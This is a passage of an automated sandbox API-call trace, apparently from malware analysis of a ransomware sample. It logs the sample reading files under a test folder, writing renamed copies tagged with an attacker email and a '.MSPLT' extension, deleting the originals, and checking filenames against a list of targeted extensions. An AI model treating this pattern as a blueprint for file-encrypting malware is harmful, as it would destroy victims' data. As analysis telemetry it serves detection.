dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0168.807] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0168.807] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0168.807] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0168.810] GetLastError () returned 0x0 [0168.810] ReadFile (in: hFile=0x304, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0xe8e, lpOverlapped=0x0) returned 1 [0168.812] WriteFile (in: hFile=0x308, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xe90, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xe90, lpOverlapped=0x0) returned 1 [0168.814] ReadFile (in: hFile=0x304, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0168.814] WriteFile (in: hFile=0x308, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xe4, lpOverlapped=0x0) returned 1 [0168.814] SetEndOfFile (hFile=0x308) returned 1 [0168.814] CloseHandle (hObject=0x308) returned 1 [0168.819] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0168.819] SetEndOfFile (hFile=0x304) returned 1 [0168.820] CloseHandle (hObject=0x304) returned 1 [0168.821] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0168.821] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf")) returned 1 [0168.822] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0168.822] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0169.075] lstrlenW (lpString=".doc") returned 4 [0169.076] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0169.076] lstrlenW (lpString=".docx") returned 5 [0169.076] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0169.076] lstrlenW (lpString=".pdf") returned 4 [0169.076] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0169.076] lstrlenW (lpString=".xls") returned 4 [0169.076] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0169.076] lstrlenW (lpString=".xlsx") returned 5 [0169.076] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0169.076] lstrlenW (lpString=".ppt") returned 4 [0169.076] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0169.076] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0169.076] lstrlenW (lpString=".zip") returned 4 [0169.076] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0169.076] lstrlenW (lpString=".rar") returned 4 [0169.076] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0169.076] lstrlenW (lpString=".bz2") returned 4 [0169.076] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0169.076] lstrlenW (lpString=".7z") returned 3 [0169.076] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0169.076] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0169.076] lstrlenW (lpString=".dbf") returned 4 [0169.076] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0169.076] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0169.076] lstrlenW (lpString=".1cd") returned 4 [0169.076] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0169.076] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0169.076] lstrlenW (lpString=".jpg") returned 4 [0169.077] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0169.077] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0169.077] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0169.077] lstrlenW (lpString=".doc") returned 4 [0169.077] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0169.077] lstrlenW (lpString=".docx") returned 5 [0169.077] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0169.077] lstrlenW (lpString=".pdf") returned 4 [0169.077] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0169.077] lstrlenW (lpString=".xls") returned 4 [0169.077] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0169.077] lstrlenW (lpString=".xlsx") returned 5 [0169.077] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0169.077] lstrlenW (lpString=".ppt") returned 4 [0169.077] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0169.077] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0169.077] lstrlenW (lpString=".zip") returned 4 [0169.077] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0169.077] lstrlenW (lpString=".rar") returned 4 [0169.077] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0169.077] lstrlenW (lpString=".bz2") returned 4 [0169.077] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0169.077] lstrlenW (lpString=".7z") returned 3 [0169.077] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0169.077] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0169.077] lstrlenW (lpString=".dbf") returned 4 [0169.077] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0169.077] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0169.078] lstrlenW (lpString=".1cd") returned 4 [0169.078] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0169.078] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0169.078] lstrlenW (lpString=".jpg") returned 4 [0169.078] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0169.078] Sleep (dwMilliseconds=0x64) [0169.739] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0169.739] lstrlenW (lpString="LocalizedData.xml") returned 17 [0169.739] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0169.908] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=77022) returned 1 [0169.908] CloseHandle (hObject=0x2f8) returned 1 [0169.909] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml")) returned 0x80 [0169.909] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0169.909] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0169.909] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.909] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.909] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0169.909] GetLastError () returned 0x0 [0169.909] ReadFile (in: hFile=0x2f8, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x12cde, lpOverlapped=0x0) returned 1 [0169.941] WriteFile (in: hFile=0x2e8, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x12ce0, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x12ce0, lpOverlapped=0x0) returned 1 [0169.943] ReadFile (in: hFile=0x2f8, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0169.943] WriteFile (in: hFile=0x2e8, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xf6, lpOverlapped=0x0) returned 1 [0169.943] SetEndOfFile (hFile=0x2e8) returned 1 [0169.943] CloseHandle (hObject=0x2e8) returned 1 [0169.945] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.945] SetEndOfFile (hFile=0x2f8) returned 1 [0169.946] CloseHandle (hObject=0x2f8) returned 1 [0169.947] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0169.947] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml")) returned 1 [0169.947] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0169.947] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0169.947] lstrlenW (lpString=".doc") returned 4 [0169.947] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0169.947] lstrlenW (lpString=".docx") returned 5 [0169.947] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0169.947] lstrlenW (lpString=".pdf") returned 4 [0169.947] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0169.947] lstrlenW (lpString=".xls") returned 4 [0169.947] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0169.948] lstrlenW (lpString=".xlsx") returned 5 [0169.948] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0169.948] lstrlenW (lpString=".ppt") returned 4 [0169.948] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0169.948] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0169.948] lstrlenW (lpString=".zip") returned 4 [0169.948] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0169.948] lstrlenW (lpString=".rar") returned 4 [0169.948] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0169.948] lstrlenW (lpString=".bz2") returned 4 [0169.948] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0169.948] lstrlenW (lpString=".7z") returned 3 [0169.948] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0169.948] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0169.948] lstrlenW (lpString=".dbf") returned 4 [0169.948] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0169.948] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0169.948] lstrlenW (lpString=".1cd") returned 4 [0169.948] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0169.948] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0169.948] lstrlenW (lpString=".jpg") returned 4 [0169.948] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0169.948] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0169.948] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0169.948] lstrlenW (lpString=".doc") returned 4 [0169.948] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0169.948] lstrlenW (lpString=".docx") returned 5 [0169.948] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0169.948] lstrlenW (lpString=".pdf") returned 4 [0169.948] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0169.948] lstrlenW (lpString=".xls") returned 4 [0169.948] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0169.948] lstrlenW (lpString=".xlsx") returned 5 [0169.948] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0169.948] lstrlenW (lpString=".ppt") returned 4 [0169.948] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0169.949] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0169.949] lstrlenW (lpString=".zip") returned 4 [0169.949] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0169.949] lstrlenW (lpString=".rar") returned 4 [0169.949] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0169.949] lstrlenW (lpString=".bz2") returned 4 [0169.949] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0169.949] lstrlenW (lpString=".7z") returned 3 [0169.949] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0169.949] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0169.949] lstrlenW (lpString=".dbf") returned 4 [0169.949] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0169.949] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0169.949] lstrlenW (lpString=".1cd") returned 4 [0169.949] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0169.949] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0169.949] lstrlenW (lpString=".jpg") returned 4 [0169.949] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0169.949] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0169.949] lstrlenW (lpString="eula.rtf") returned 8 [0169.949] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0170.236] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=4254) returned 1 [0170.236] CloseHandle (hObject=0x2fc) returned 1 [0170.236] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf")) returned 0x80 [0170.237] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0170.237] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0170.237] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.237] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.237] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0170.487] GetLastError () returned 0x0 [0170.487] ReadFile (in: hFile=0x2fc, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x109e, lpOverlapped=0x0) returned 1 [0170.768] WriteFile (in: hFile=0x2f4, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x10a0, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x10a0, lpOverlapped=0x0) returned 1 [0170.770] ReadFile (in: hFile=0x2fc, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0170.770] WriteFile (in: hFile=0x2f4, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xe4, lpOverlapped=0x0) returned 1 [0170.770] SetEndOfFile (hFile=0x2f4) returned 1 [0170.770] CloseHandle (hObject=0x2f4) returned 1 [0170.772] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.772] SetEndOfFile (hFile=0x2fc) returned 1 [0170.773] CloseHandle (hObject=0x2fc) returned 1 [0170.773] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0170.773] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf")) returned 1 [0170.774] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0170.774] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0170.774] lstrlenW (lpString=".doc") returned 4 [0170.774] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0170.774] lstrlenW (lpString=".docx") returned 5 [0170.774] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0170.774] lstrlenW (lpString=".pdf") returned 4 [0170.774] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0170.774] lstrlenW (lpString=".xls") returned 4 [0170.774] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0170.774] lstrlenW (lpString=".xlsx") returned 5 [0170.774] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0170.774] lstrlenW (lpString=".ppt") returned 4 [0170.774] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0170.774] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0170.774] lstrlenW (lpString=".zip") returned 4 [0170.774] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0170.774] lstrlenW (lpString=".rar") returned 4 [0170.774] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0170.774] lstrlenW (lpString=".bz2") returned 4 [0170.774] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0170.774] lstrlenW (lpString=".7z") returned 3 [0170.774] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0170.775] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0170.775] lstrlenW (lpString=".dbf") returned 4 [0170.775] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0170.775] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0170.775] lstrlenW (lpString=".1cd") returned 4 [0170.775] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0170.775] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0170.775] lstrlenW (lpString=".jpg") returned 4 [0170.775] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0170.775] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0170.775] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0170.775] lstrlenW (lpString=".doc") returned 4 [0170.775] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0170.775] lstrlenW (lpString=".docx") returned 5 [0170.775] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0170.775] lstrlenW (lpString=".pdf") returned 4 [0170.775] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0170.775] lstrlenW (lpString=".xls") returned 4 [0170.775] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0170.775] lstrlenW (lpString=".xlsx") returned 5 [0170.775] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0170.775] lstrlenW (lpString=".ppt") returned 4 [0170.775] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0170.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0170.776] lstrlenW (lpString=".zip") returned 4 [0170.776] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0170.776] lstrlenW (lpString=".rar") returned 4 [0170.776] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0170.776] lstrlenW (lpString=".bz2") returned 4 [0170.776] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0170.776] lstrlenW (lpString=".7z") returned 3 [0170.776] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0170.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0170.776] lstrlenW (lpString=".dbf") returned 4 [0170.776] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0170.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0170.776] lstrlenW (lpString=".1cd") returned 4 [0170.776] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0170.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0170.776] lstrlenW (lpString=".jpg") returned 4 [0170.776] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0170.776] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0170.776] lstrlenW (lpString="LocalizedData.xml") returned 17 [0170.776] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0170.800] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=68226) returned 1 [0170.800] CloseHandle (hObject=0x2fc) returned 1 [0170.801] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml")) returned 0x80 [0170.801] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0170.801] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0170.801] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.801] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.801] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0170.801] GetLastError () returned 0x0 [0170.801] ReadFile (in: hFile=0x2fc, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x10a82, lpOverlapped=0x0) returned 1 [0170.814] WriteFile (in: hFile=0x2f4, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x10a90, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x10a90, lpOverlapped=0x0) returned 1 [0170.816] ReadFile (in: hFile=0x2fc, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0170.816] WriteFile (in: hFile=0x2f4, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xf6, lpOverlapped=0x0) returned 1 [0170.816] SetEndOfFile (hFile=0x2f4) returned 1 [0170.817] CloseHandle (hObject=0x2f4) returned 1 [0170.819] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.819] SetEndOfFile (hFile=0x2fc) returned 1 [0170.821] CloseHandle (hObject=0x2fc) returned 1 [0170.821] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 